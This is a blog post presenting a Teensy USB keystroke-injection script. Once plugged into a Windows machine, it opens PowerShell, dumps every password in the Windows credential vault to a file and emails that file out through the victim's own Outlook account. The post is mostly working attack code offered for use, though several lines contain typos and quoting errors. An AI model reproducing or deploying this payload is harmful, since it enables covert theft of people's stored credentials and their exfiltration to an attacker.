Teensy Script to Exfil Passwords Through Outlook

Using the previous posts CLI commands to unveil cached credentials, here is an additional implementation which will exfil the data from the users own Outlook account.

Once plugged in, the Teensy will do the following:

  1. Launch an unelevated Powershell prompt (no administrative access required).
  2. Run a brief few lines of code to dump the security credential cache to a file in the %appdata% folder.
  3. Create an email and attach said file to it
  4. Send the email

 

/*
 Author:         Davey Addison [ Secsi/@Supersafesecs ]
 Github:         github.com/Secsi
 Webby:          simpleinfosec.com
  
 Teensy Password Exfil Through Outlook 
 
 Script dumps passwords from Windows security credential store into a file and exfils the information on an Outlook attachment
 Issues: Email remains in sent items folder!!!
 
*/
#if defined(CORE_TEENSY)
#define LED_PIN 6
#endif

void setup(){
 delay(1500);
 posh();
 Keyboard.prinln("$path=$env:APPDATA+"\file.txt"");
 Keyboard.prinln("[void]");
 Keyboard.prinln("[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]");
 Keyboard.prinln("$vault = New-Object Windows.Security.Credentials.PasswordVault");
 Keyboard.prinln("$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > $path");
 Keyboard.prinln("Add-Type -Assembly 'Microsoft.Office.Interop.Outlook' -PassThru");
 Keyboard.prinln("$Outlook = New-Object -ComObject Outlook.Application");
 Keyboard.prinln("$Mail = $Outlook.CreateItem(0)");
 Keyboard.prinln("$Mail.Recipients.Add('someone@somewhere.com')");
 Keyboard.prinln("$Mail.Subject='Data Extracted'");
 Keyboard.prinln("$Mail.Body = 'test email'");
 Keyboard.prinln("$Mail.Attachments.Add($path)");
 Keyboard.prinln("$Mail.Send()");
 Keyboard.println("exit")
}

void loop(){
 // blink quickly when complete
 digitalWrite(LED_PIN, HIGH);
 delay(200);
 digitalWrite(LED_PIN, LOW);
 delay(200);
}

void posh(){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(1500);
  Keyboard.print("powershell");
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(2000);
}

 


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s